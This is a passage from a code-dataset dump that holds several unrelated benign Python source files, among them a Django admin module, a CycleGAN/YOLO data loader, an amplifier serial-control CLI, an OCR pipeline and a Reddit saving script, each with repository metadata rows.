"BSD-3-Clause"
] | null | null | null |
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as DjangoUserAdmin
from .models import Student, User
admin.site.site_header = 'BIA SCHOOL SYSTEM'
class UserAdmin(DjangoUserAdmin):
model = User
fieldsets = DjangoUserAdmin.fieldsets + ((None, {
'fields': ('role', 'middle_name',
'birth_date')}),)
list_display = ('role', 'last_name', 'first_name',
'middle_name', 'birth_date')
def save_model(self, request, obj, form, change):
if request.user.is_teacher:
obj.is_staff = True
obj.save()
admin.site.register(User, UserAdmin)
class StudentUser(UserAdmin):
model = Student
fieldsets = UserAdmin.fieldsets + ((None, {
'fields': ('entry_year', 'klass')}),)
list_display = ('role', 'last_name', 'first_name',
'middle_name', 'birth_date',
'entry_year', 'klass')
search_fields = ('last_name', 'first_name',
'middle_name', 'entry_year', 'klass')
admin.site.register(Student, StudentUser)
| 28.230769
| 66
| 0.613079
| 119
| 1,101
| 5.478992
| 0.411765
| 0.06135
| 0.069018
| 0.087423
| 0.197853
| 0.197853
| 0.156442
| 0.156442
| 0.156442
| 0.156442
| 0
| 0
| 0.254314
| 1,101
| 38
| 67
| 28.973684
| 0.794153
| 0
| 0
| 0.076923
| 0
| 0
| 0.197094
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.115385
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5179adb5c10e59288f470f8fa76ecec344ba97b
| 1,111
|
py
|
Python
|
converter.py
|
ownerofworld/TDroidDesk
|
5c773f15d764e6cff468bb39ed40dca5ba07d902
|
[
"MIT"
] | 20
|
2017-02-22T18:36:57.000Z
|
2022-03-23T11:03:35.000Z
|
converter.py
|
extratone/TDroidDesk
|
e778463e996368374c856e6154dc0885df1f3c11
|
[
"MIT"
] | 3
|
2017-02-23T03:51:07.000Z
|
2017-03-26T15:06:35.000Z
|
converter.py
|
extratone/TDroidDesk
|
e778463e996368374c856e6154dc0885df1f3c11
|
[
"MIT"
] | 9
|
2017-02-23T19:39:20.000Z
|
2022-01-02T03:28:01.000Z
|
# coding: utf-8
"""Converter module."""
import util
THEME = 'theme'
BACKGROUND = 'background'
class ThemeConverter(object):
"""Object that converts themes using given map file."""
def __init__(self, theme_map, transp_map):
"""Constructor."""
self.theme_map = theme_map
self.transp_map = transp_map
def convert(self, source_theme):
"""Create object that describes desktop theme.
Arguments:
source_theme - theme object
"""
target_theme = util.get_empty_theme()
for desktop_key, att_key in self.theme_map.items():
if att_key not in source_theme[THEME]:
# print('Missing {0} key in source theme'.format(att_key))
continue
color = source_theme[THEME][att_key]
if desktop_key in self.transp_map:
alpha = self.transp_map[desktop_key]
color = util.apply_transparency(color, alpha)
target_theme[THEME][desktop_key] = color
target_theme[BACKGROUND] = source_theme[BACKGROUND]
return target_theme
| 26.452381
| 74
| 0.621062
| 131
| 1,111
| 5.015267
| 0.381679
| 0.100457
| 0.054795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002519
| 0.285329
| 1,111
| 41
| 75
| 27.097561
| 0.824937
| 0.212421
| 0
| 0
| 0
| 0
| 0.018116
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.052632
| 0
| 0.263158
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5195d6a3d0b3fd5a3b08706a1231fda25ed0eb8
| 2,252
|
py
|
Python
|
py/DREAM/Settings/Equations/RunawayElectronDistribution.py
|
chalmersplasmatheory/DREAM
|
715637ada94f5e35db16f23c2fd49bb7401f4a27
|
[
"MIT"
] | 12
|
2020-09-07T11:19:10.000Z
|
2022-02-17T17:40:19.000Z
|
py/DREAM/Settings/Equations/RunawayElectronDistribution.py
|
chalmersplasmatheory/DREAM
|
715637ada94f5e35db16f23c2fd49bb7401f4a27
|
[
"MIT"
] | 110
|
2020-09-02T15:29:24.000Z
|
2022-03-09T09:50:01.000Z
|
py/DREAM/Settings/Equations/RunawayElectronDistribution.py
|
chalmersplasmatheory/DREAM
|
715637ada94f5e35db16f23c2fd49bb7401f4a27
|
[
"MIT"
] | 3
|
2021-05-21T13:24:31.000Z
|
2022-02-11T14:43:12.000Z
|
import numpy as np
from DREAM.Settings.Equations.EquationException import EquationException
from . import DistributionFunction as DistFunc
from . DistributionFunction import DistributionFunction
from .. TransportSettings import TransportSettings
INIT_FORWARD = 1
INIT_XI_NEGATIVE = 2
INIT_XI_POSITIVE = 3
INIT_ISOTROPIC = 4
class RunawayElectronDistribution(DistributionFunction):
def __init__(self, settings,
fre=[0.0], initr=[0.0], initp=[0.0], initxi=[0.0],
initppar=None, initpperp=None,
rn0=None, n0=None, rT0=None, T0=None, bc=DistFunc.BC_PHI_CONST,
ad_int_r=DistFunc.AD_INTERP_CENTRED,
ad_int_p1=DistFunc.AD_INTERP_CENTRED,
ad_int_p2=DistFunc.AD_INTERP_CENTRED,
ad_jac_r=DistFunc.AD_INTERP_JACOBIAN_LINEAR,
ad_jac_p1=DistFunc.AD_INTERP_JACOBIAN_LINEAR,
ad_jac_p2=DistFunc.AD_INTERP_JACOBIAN_LINEAR,
fluxlimiterdamping=1.0):
"""
Constructor.
"""
super().__init__(settings=settings, name='f_re', grid=settings.runawaygrid,
f=fre, initr=initr, initp=initp, initxi=initxi, initppar=initppar,
initpperp=initpperp, rn0=rn0, n0=n0, rT0=rT0, T0=T0,
bc=bc, ad_int_r=ad_int_r, ad_int_p1=ad_int_p1,
ad_int_p2=ad_int_p2, fluxlimiterdamping=fluxlimiterdamping)
self.inittype = INIT_FORWARD
def setInitType(self, inittype):
"""
Specifies how the runaway electron distribution function f_re should be
initialized from the runaway density n_re.
:param int inittype: Flag indicating how to initialize f_re.
"""
self.inittype = int(inittype)
def fromdict(self, data):
"""
Load data for this object from the given dictionary.
"""
super().fromdict(data)
def scal(v):
if type(v) == np.ndarray: return v[0]
else: return v
if 'inittype' in data:
self.inittype = int(scal(data['inittype']))
def todict(self):
"""
Returns a Python dictionary containing all settings of
this RunawayElectronDistribution object.
"""
d = super().todict()
d['inittype'] = self.inittype
return d
| 30.026667
| 83
| 0.655861
| 278
| 2,252
| 5.097122
| 0.366906
| 0.031757
| 0.067749
| 0.048694
| 0.149612
| 0.08892
| 0.0494
| 0
| 0
| 0
| 0
| 0.020784
| 0.25222
| 2,252
| 74
| 84
| 30.432432
| 0.820665
| 0.150089
| 0
| 0
| 0
| 0
| 0.015608
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.125
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b51c95bad3faa026a48a62db4fc8bca989c644e2
| 7,561
|
py
|
Python
|
data/unaligned_dataset.py
|
basicskywards/cyclegan-yolo
|
536498706da30707facf1211355ff21df2e5b227
|
[
"BSD-3-Clause"
] | null | null | null |
data/unaligned_dataset.py
|
basicskywards/cyclegan-yolo
|
536498706da30707facf1211355ff21df2e5b227
|
[
"BSD-3-Clause"
] | null | null | null |
data/unaligned_dataset.py
|
basicskywards/cyclegan-yolo
|
536498706da30707facf1211355ff21df2e5b227
|
[
"BSD-3-Clause"
] | null | null | null |
import os.path
import torchvision.transforms as transforms
from data.base_dataset import BaseDataset, get_transform
from data.image_folder import make_dataset
from PIL import Image
import PIL
from pdb import set_trace as st
import torch
import numpy as np
#from yolo.utils.datasets import pad
#import torchvision.transforms as transforms
from yolo.utils.datasets import pad_to_square, resize, pad_to_square2
class UnalignedDataset(BaseDataset): # I/O for hybrid YOLOv3 + CycleGAN! Unsupported for batch data for YOLOv3
def initialize(self, opt, normalized_labels = True):
self.opt = opt
self.root = opt.dataroot
self.normalized_labels = normalized_labels
# self.dir_A = os.path.join(opt.dataroot, opt.phase + 'A')
# self.dir_B = os.path.join(opt.dataroot, opt.phase + 'B')
self.dir_A = os.path.join(opt.dataroot, 'A_train.txt') # A.txt contains a list of path/to/img1.jpg
self.dir_B = os.path.join(opt.dataroot, 'B_train.txt')
self.A_paths = make_dataset(self.dir_A)
self.B_paths = make_dataset(self.dir_B)
self.A_paths = sorted(self.A_paths)
self.B_paths = sorted(self.B_paths)
self.A_size = len(self.A_paths)
self.B_size = len(self.B_paths)
self.transform = get_transform(opt) # transform for cyclegan
# prepare targets for yolo
self.A_label_files = [
path.replace("images", "labels").replace(".png", ".txt").replace(".jpg", ".txt")
for path in self.A_paths
]
# self.A_label_files = [
# path.replace("images", "labels").replace(".png", ".txt").replace(".jpg", ".txt").replace("rainy/", "").replace("cloudy1000/", "").replace("sunny/", "").replace("night_or_night_and_rainy/", "")
# for path in self.A_paths
# ]
self.B_label_files = [
path.replace("images", "labels").replace(".png", ".txt").replace(".jpg", ".txt").replace("rainy/", "").replace("cloudy1000/", "").replace("sunny/", "").replace("night_or_night_and_rainy/", "")
for path in self.B_paths
]
def __getitem__(self, index):
A_path = self.A_paths[index % self.A_size]
B_path = self.B_paths[index % self.B_size]
A_path = A_path.strip('\n')
B_path = B_path.strip('\n')
#print('A_path = ', A_path)
A_img = Image.open(A_path).convert('RGB')
B_img = Image.open(B_path).convert('RGB')
#img = transforms.ToTensor()(Image.open(img_path).convert('RGB'))
tmp_A = transforms.ToTensor()(A_img)
#print('\n**************************************************A_img.shape = ', tmp_A.shape)
_, h, w = tmp_A.shape
h_factor, w_factor = (h, w) if self.normalized_labels else (1, 1)
# Pad to square resolution
tmp_A, pad = pad_to_square2(tmp_A, 0)
_, padded_h, padded_w = tmp_A.shape
tmp_B = transforms.ToTensor()(B_img)
#print('\n**************************************************A_img.shape = ', tmp_A.shape)
_, hB, wB = tmp_B.shape
h_factorB, w_factorB = (hB, wB) if self.normalized_labels else (1, 1)
# Pad to square resolution
tmp_B, padB = pad_to_square2(tmp_B, 0)
_, padded_hB, padded_wB = tmp_B.shape
A_img = self.transform(A_img)
B_img = self.transform(B_img)
# ---------
# Label
# ---------
def label_path2bboxes(label_path, pad, h_factor, w_factor, padded_h, padded_w):
tmp_targets = None
if os.path.exists(label_path):
boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))
# Extract coordinates for unpadded + unscaled image
x1 = w_factor * (boxes[:, 1] - boxes[:, 3] / 2)
y1 = h_factor * (boxes[:, 2] - boxes[:, 4] / 2)
x2 = w_factor * (boxes[:, 1] + boxes[:, 3] / 2)
y2 = h_factor * (boxes[:, 2] + boxes[:, 4] / 2)
# Adjust for added padding
x1 += pad[0]
y1 += pad[2]
x2 += pad[1]
y2 += pad[3]
# Returns (x, y, w, h) in scale [0, 1]
boxes[:, 1] = ((x1 + x2) / 2) / padded_w
boxes[:, 2] = ((y1 + y2) / 2) / padded_h
boxes[:, 3] *= w_factor / padded_w
boxes[:, 4] *= h_factor / padded_h
#print('\nboxes x y w h: ', boxes)
tmp_targets = torch.zeros((len(boxes), 6))
tmp_targets[:, 1:] = boxes
return tmp_targets
label_path = self.A_label_files[index % len(self.A_paths)].rstrip()
A_targets = label_path2bboxes(label_path, pad, h_factor, w_factor, padded_h, padded_w)
label_path_B = self.B_label_files[index % len(self.B_paths)].rstrip()
B_targets = label_path2bboxes(label_path_B, padB, h_factorB, w_factorB, padded_hB, padded_wB)
#print('targets = ', targets)
#targets = generate_YOLO_targets(self.bbox) # A_path = A_annotation
# return {'A': A_img, 'B': B_img,
# 'A_paths': A_path, 'B_paths': B_path,
# 'targets': targets}
return {'A': A_img, 'B': B_img,
'A_paths': A_path, 'B_paths': B_path,
'A_targets': A_targets, 'B_targets': B_targets} # add B_bbox, A_bbox
def collate_fn(self, batch):
# input images will be resized to 416
# this collate_fn to suport batchSize >= 2
#print('collate fn: ', zip(*batch))
tmp = list(batch)
#print('tmp = ', len(tmp))
target_As = [data['A_targets'] for data in tmp if data['A_targets'] is not None]
#print('targets_As = ', target_As)
for i, boxes in enumerate(target_As):
boxes[:, 0] = i
target_As = torch.cat(target_As, 0) # BUG
#print('target_As: ', target_As.shape)
#print('target_As cat = ', target_As)
target_Bs = [data['B_targets'] for data in tmp if data['B_targets'] is not None]
for i, boxes in enumerate(target_Bs):
boxes[:, 0] = i
#print('\ntarget_Bs: ', target_Bs)
#target_Bs = torch.cat(target_Bs, 0) # BUG
As = torch.stack([data['A'] for data in tmp])
Bs = torch.stack([data['B'] for data in tmp])
path_As = [data['A_paths'] for data in tmp]
#path_As = torch.cat(path_As, 0)
path_Bs = [data['B_paths'] for data in tmp]
#path_Bs = torch.cat(path_Bs, 0)
# paths, imgs, targets = list(zip(*batch))
# # Remove empty placeholder targets
# targets = [boxes for boxes in targets if boxes is not None]
# # Add sample index to targets
# for i, boxes in enumerate(targets):
# boxes[:, 0] = i
# targets = torch.cat(targets, 0)
# # Selects new image size every tenth batch
# if self.multiscale and self.batch_count % 10 == 0:
# self.img_size = random.choice(range(self.min_size, self.max_size + 1, 32))
# # Resize images to input shape
# imgs = torch.stack([resize(img, self.img_size) for img in imgs])
# self.batch_count += 1
return {'A': As, 'B': Bs,
'A_paths': path_As, 'B_paths': path_Bs,
'A_targets': target_As, 'B_targets': target_Bs}
def __len__(self):
return max(self.A_size, self.B_size)
def name(self):
return 'UnalignedDataset'
| 40.005291
| 206
| 0.562492
| 1,031
| 7,561
| 3.903977
| 0.173618
| 0.017391
| 0.019876
| 0.017888
| 0.358261
| 0.308571
| 0.244969
| 0.201491
| 0.172671
| 0.159255
| 0
| 0.015264
| 0.289512
| 7,561
| 188
| 207
| 40.218085
| 0.733991
| 0.297183
| 0
| 0.020619
| 0
| 0
| 0.0518
| 0.004761
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061856
| false
| 0
| 0.103093
| 0.020619
| 0.226804
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b51f90c659e185b69613117f368541efd8ec132f
| 8,396
|
py
|
Python
|
primare_control/primare_interface.py
|
ZenithDK/primare-control
|
597a2dd15bedb511fab5cca8d01044692d1e2d96
|
[
"Apache-2.0"
] | null | null | null |
primare_control/primare_interface.py
|
ZenithDK/primare-control
|
597a2dd15bedb511fab5cca8d01044692d1e2d96
|
[
"Apache-2.0"
] | null | null | null |
primare_control/primare_interface.py
|
ZenithDK/primare-control
|
597a2dd15bedb511fab5cca8d01044692d1e2d96
|
[
"Apache-2.0"
] | null | null | null |
"""Interface to Primare amplifiers using Twisted SerialPort.
This module allows you to control your Primare I22 and I32 amplifier from the
command line using Primare's binary protocol via the RS232 port on the
amplifier.
"""
import logging
import click
from contextlib import closing
from primare_control import PrimareController
# from twisted.logger import (
# FilteringLogObserver,
# globalLogBeginner,
# Logger,
# LogLevel,
# LogLevelFilterPredicate,
# textFileLogObserver
# )
# log = Logger()
# globalLogBeginner.beginLoggingTo([
# FilteringLogObserver(
# textFileLogObserver(sys.stdout),
# [LogLevelFilterPredicate(LogLevel.debug)]
# )
# ])
# Setup logging so that is available
FORMAT = '%(asctime)-15s %(name)s %(levelname)-8s %(message)s'
logging.basicConfig(level=logging.DEBUG, format=FORMAT)
logger = logging.getLogger(__name__)
class DefaultCmdGroup(click.Group):
"""Custom implementation for handling Primare methods in a unified way."""
def list_commands(self, ctx):
"""List Primare Control methods."""
rv = [method for method in dir(PrimareController)
if not method.startswith('_')]
rv.append('interactive')
rv.sort()
return rv
def get_command(self, ctx, name):
"""Return click command."""
@click.pass_context
def subcommand(*args, **kwargs):
#logger.debug("subcommand args: {}".format(args))
#logger.debug("subcommand kwargs: {}".format(kwargs))
ctx = args[0]
params = ctx.obj['parameters']
ctx.obj['p_ctrl'] = PrimareController(port=params['port'],
baudrate=params['baudrate'],
source=None,
volume=None,
debug=params['debug'])
with closing(ctx.obj['p_ctrl']):
try:
if ctx.obj['parameters']['amp_info']:
ctx.obj['p_ctrl'].setup()
method = getattr(PrimareController, name)
if len(kwargs):
method(ctx.obj['p_ctrl'], int(kwargs['value']))
else:
method(ctx.obj['p_ctrl'])
except KeyboardInterrupt:
logger.info("User aborted")
except TypeError as e:
logger.error(e)
if name == "interactive":
cmd = click.Group.get_command(self, ctx, 'interactive')
else:
if name in [method for method in dir(PrimareController)
if not method.startswith('_')]:
# attach doc from original callable so it will appear in CLI
# output
subcommand.__doc__ = getattr(PrimareController, name).__doc__
if getattr(PrimareController,
name).__func__.__code__.co_argcount > 1:
params_arg = [click.Argument(("value",))]
else:
params_arg = None
cmd = click.Command(name,
params=params_arg,
callback=subcommand)
else:
#logger.debug("get_command no_such_cmd")
cmd = None
return cmd
@click.command(cls=DefaultCmdGroup)
@click.pass_context
@click.option("--amp-info",
default=False,
is_flag=True,
help="Retrieve and print amplifier information")
@click.option("--baudrate",
default='4800',
type=click.Choice(['300',
'1200',
'2400',
'4800',
'9600',
'19200',
'57600',
'115200']),
help="Serial port baudrate. For I22 it _must_ be 4800.")
@click.option("--debug",
"-d",
default=False,
is_flag=True,
help="Enable debug output.")
@click.option("--port",
"-p",
default="/dev/ttyUSB0",
help="Serial port to use (e.g. 3 for a COM port on Windows, "
"/dev/ttyATH0 for Arduino Yun, /dev/ttyACM0 for Serial-over-USB "
"on RaspberryPi.")
def cli(ctx, amp_info, baudrate, debug, port):
"""Prototype command."""
try:
# on Windows, we need port to be an integer
port = int(port)
except ValueError:
pass
ctx.obj = {}
ctx.obj['p_ctrl'] = None
ctx.obj['parameters'] = {
'amp_info': amp_info,
'baudrate': baudrate,
'debug': debug,
'port': port,
}
@cli.command()
@click.pass_context
def interactive(ctx):
"""Start interactive shell for controlling a Primare amplifier.
Press enter (blank line), 'q' or 'quit' to exit.
For a list of available commands, type 'help'
"""
method_list = [
(method,
getattr(PrimareController, method).__doc__) for
method in dir(PrimareController) if not method.startswith('_')]
help_string = """To exit, press enter (blank line) or type 'q' or 'quit'.\n
Available commands are:
{}""".format('\n'.join(" {} {}".format(method.ljust(25), doc.splitlines()[0])
for method, doc in method_list))
try:
params = ctx.obj['parameters']
ctx.obj['p_ctrl'] = PrimareController(port=params['port'],
baudrate=params['baudrate'],
source=None,
volume=None,
debug=params['debug'])
if ctx.obj['parameters']['amp_info']:
ctx.obj['p_ctrl'].setup()
logger.info(help_string)
nb = ''
while True:
nb = raw_input('Cmd: ').strip()
if not nb or nb == 'q' or nb == 'quit':
logger.debug("Quit: '{}'".format(nb))
break
elif nb.startswith('help'):
if len(nb.split()) == 2:
help_method = nb.split()[1]
matches = [item for item in method_list
if item[0].startswith(help_method)]
if len(matches):
logger.info("\n".join("\n== {}\n{}".format(
method.ljust(25), doc_string) for
method, doc_string in matches))
else:
logger.info(
"Help requested on unknown method: {}".format(
help_method))
else:
logger.info(help_string)
else:
parsed_cmd = nb.split()
command = getattr(ctx.obj['p_ctrl'], parsed_cmd[0], None)
if command:
try:
if len(parsed_cmd) > 1:
if parsed_cmd[1].lower() == "true":
parsed_cmd[1] = True
elif parsed_cmd[1].lower() == "false":
parsed_cmd[1] = False
elif parsed_cmd[0] == "remote_cmd":
pass
parsed_cmd[1] = '{}'.format(parsed_cmd[1])
else:
parsed_cmd[1] = int(parsed_cmd[1])
command(parsed_cmd[1])
else:
command()
except TypeError as e:
logger.warn("You called a method with an incorrect" +
"number of parameters: {}".format(e))
else:
logger.info("No such function - try again")
except KeyboardInterrupt:
logger.info("User aborted")
# in a non-main thread:
ctx.obj['p_ctrl'].close()
del ctx.obj['p_ctrl']
ctx.obj['p_ctrl'] = None
if __name__ == '__main__':
cli()
| 36.504348
| 79
| 0.47737
| 798
| 8,396
| 4.902256
| 0.288221
| 0.027607
| 0.021472
| 0.033742
| 0.221115
| 0.162065
| 0.126278
| 0.126278
| 0.126278
| 0.112986
| 0
| 0.01643
| 0.412816
| 8,396
| 229
| 80
| 36.663755
| 0.777079
| 0.137685
| 0
| 0.293413
| 0
| 0
| 0.129792
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02994
| false
| 0.02994
| 0.023952
| 0
| 0.071856
| 0.005988
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b51fa08d66290d275d2da9e4167fcbc0a1d4e931
| 382
|
py
|
Python
|
sjfxjc/foundations-for-analytics-with-python-master/csv/2csv_reader_parsing_and_write.py
|
SaronZhou/python
|
40d73b49b9b17542c73a3c09d28e479d2fefcde3
|
[
"MIT"
] | null | null | null |
sjfxjc/foundations-for-analytics-with-python-master/csv/2csv_reader_parsing_and_write.py
|
SaronZhou/python
|
40d73b49b9b17542c73a3c09d28e479d2fefcde3
|
[
"MIT"
] | null | null | null |
sjfxjc/foundations-for-analytics-with-python-master/csv/2csv_reader_parsing_and_write.py
|
SaronZhou/python
|
40d73b49b9b17542c73a3c09d28e479d2fefcde3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import csv
import sys
input_file = sys.argv[1]
output_file = sys.argv[2]
with open(input_file, 'r', newline='') as csv_in_file:
with open(output_file, 'w', newline='') as csv_out_file:
filereader = csv.reader(csv_in_file, delimiter=',')
filewriter = csv.writer(csv_out_file, delimiter=',')
for row_list in filereader:
filewriter.writerow(row_list)
| 29.384615
| 57
| 0.730366
| 61
| 382
| 4.344262
| 0.491803
| 0.067925
| 0.083019
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008982
| 0.125654
| 382
| 13
| 58
| 29.384615
| 0.784431
| 0.054974
| 0
| 0
| 0
| 0
| 0.01108
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5220f9d88a447b033fc07fa837a16f3731fa688
| 1,971
|
py
|
Python
|
ocrDA.py
|
it-pebune/ani-research-data-extraction
|
e8b0ffecb0835020ce7942223cf566dc45ccee35
|
[
"MIT"
] | null | null | null |
ocrDA.py
|
it-pebune/ani-research-data-extraction
|
e8b0ffecb0835020ce7942223cf566dc45ccee35
|
[
"MIT"
] | 7
|
2022-01-29T22:19:55.000Z
|
2022-03-28T18:18:19.000Z
|
ocrDA.py
|
it-pebune/ani-research-data-extraction
|
e8b0ffecb0835020ce7942223cf566dc45ccee35
|
[
"MIT"
] | null | null | null |
import json
from NewDeclarationInQueue.formular_converter import FormularConverter
from NewDeclarationInQueue.preprocess_one_step import PreprocessOneStep
from NewDeclarationInQueue.preprocess_two_steps import PreProcessTwoSteps
from NewDeclarationInQueue.processfiles.customprocess.search_text_line_parameter import SearchTextLineParameter
from NewDeclarationInQueue.processfiles.customprocess.table_config_detail import TableConfigDetail
from NewDeclarationInQueue.processfiles.customprocess.text_with_special_ch import TextWithSpecialCharacters
from NewDeclarationInQueue.processfiles.ocr_worker import OcrWorker
from NewDeclarationInQueue.processfiles.process_messages import ProcessMessages
def process_only_second_steps(input_file_path: str):
second_step = PreprocessOneStep()
#second_step.process_step_two(input_file_path)
second_step.process_custom_model_step_two(input_file_path)
def get_input(input_file: str):
node = []
with open(input_file) as json_data:
node = json.load(json_data)
json_data.close()
return node
def process_two_steps(sfile: str):
str_msg_id = 'abc'
dict_input = get_input(sfile)
two_steps = PreProcessTwoSteps()
process_messages = ProcessMessages('OCR Process', str_msg_id)
one_step = PreprocessOneStep()
ocr_constants = one_step.get_env()
ocr_file, process_messages = two_steps.get_file_info(dict_input, process_messages)
formular_converter = FormularConverter()
ocr_formular = formular_converter.get_formular_info(ocr_constants, ocr_file)
#process_messages_json = two_steps.process_document(ocr_file, ocr_constants, ocr_formular, process_messages)
process_messages = two_steps.process_document_with_custom_model(ocr_file, ocr_constants, process_messages)
#two_steps.save_in_output_queue(process_messages_json)
#process_only_second_steps(r"test_url.json")
process_two_steps(r"test_url.json")
| 38.647059
| 112
| 0.811771
| 235
| 1,971
| 6.395745
| 0.289362
| 0.08982
| 0.123087
| 0.0998
| 0.049235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129376
| 1,971
| 50
| 113
| 39.42
| 0.875874
| 0.125824
| 0
| 0
| 0
| 0
| 0.015734
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.3
| 0
| 0.433333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b525a442d992316233f044f50e799f9a075c90fa
| 1,270
|
py
|
Python
|
app/users/tasks.py
|
atulmishra-one/dairy_management_portal
|
a07320dc0f4419d4c78f7d2453c63b1c9544aba8
|
[
"MIT"
] | 2
|
2020-08-02T10:06:19.000Z
|
2022-03-29T06:10:57.000Z
|
app/users/tasks.py
|
atulmishra-one/dairy_management_portal
|
a07320dc0f4419d4c78f7d2453c63b1c9544aba8
|
[
"MIT"
] | null | null | null |
app/users/tasks.py
|
atulmishra-one/dairy_management_portal
|
a07320dc0f4419d4c78f7d2453c63b1c9544aba8
|
[
"MIT"
] | 2
|
2019-02-03T15:44:02.000Z
|
2021-03-09T07:30:28.000Z
|
import xlrd
from app.services.extension import task_server, sqlalchemy as db
from app.models.core.user import User
from app.application import initialize_app
try:
from app.config.production import ProductionConfig as config_object
except ImportError:
from app.config.local import LocalConfig as config_object
@task_server.task()
def upload_users(file_object):
workbook = xlrd.open_workbook(file_object)
worksheet = workbook.sheet_by_index(0)
offset = 0
rows = []
for i, row in enumerate(range(worksheet.nrows)):
if i <= offset: # (Optionally) skip headers
continue
r = []
for j, col in enumerate(range(worksheet.ncols)):
r.append(worksheet.cell_value(i, j))
rows.append(r)
users = []
for i, row in enumerate(rows):
users.append({
'initial_name': row[0],
'first_name': row[1],
'last_name': row[2],
'username': row[3],
'email': row[4],
'password': row[5],
'active': row[6]
})
app = initialize_app(config_object)
with app.test_request_context():
user_object = User()
user_object.create_or_update(users)
return "OK."
| 27.608696
| 71
| 0.607874
| 157
| 1,270
| 4.770701
| 0.509554
| 0.046729
| 0.034713
| 0.024032
| 0.048064
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009934
| 0.286614
| 1,270
| 46
| 72
| 27.608696
| 0.816777
| 0.019685
| 0
| 0
| 0
| 0
| 0.049035
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0.027027
| 0.189189
| 0
| 0.243243
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b526e227b8af6adb71768eb4900aaf57a69f1acb
| 3,444
|
py
|
Python
|
savenger.py
|
SlapBot/GodkillerArmor
|
27058332cd94c4389b092a621eeedc834d8f5a15
|
[
"MIT"
] | 3
|
2018-07-06T17:06:28.000Z
|
2018-09-06T03:31:43.000Z
|
savenger.py
|
SlapBot/GodkillerArmor
|
27058332cd94c4389b092a621eeedc834d8f5a15
|
[
"MIT"
] | null | null | null |
savenger.py
|
SlapBot/GodkillerArmor
|
27058332cd94c4389b092a621eeedc834d8f5a15
|
[
"MIT"
] | 1
|
2018-07-10T00:13:07.000Z
|
2018-07-10T00:13:07.000Z
|
from praw import Reddit
import random
class Savenger:
AVENGERS = ["Iron Man", "Doctor Strange", "Star-Lord", "Black Widow", "Thor",
"Spider-Man", "Captain America", "Wanda Maximoff", "Bucky Barnes",
"Loki", "Hulk", "Black Panther", "Vision", "Gamora", "Drax", "Nebula",
"Sam Wilson", "Mantis", "Okoye", "Shuri", "Groot", "Rocket", "Heimdall"]
def __init__(self):
self.Reddit = Reddit
def get_superhero(self):
return random.choice(self.AVENGERS)
def authenticate(self, username, password, client_id, client_secret, user_agent):
print("Authenticating...")
try:
self.reddit = self.Reddit(user_agent=user_agent, client_id=client_id,
client_secret=client_secret, username=username,
password=password)
self.user = self.reddit.user.me()
print(f"Authenticated as {self.user}")
return self.reddit
except Exception as e:
print(e)
exit()
def save(self, subreddit):
try:
print("Savengers are on the way, stay hold.")
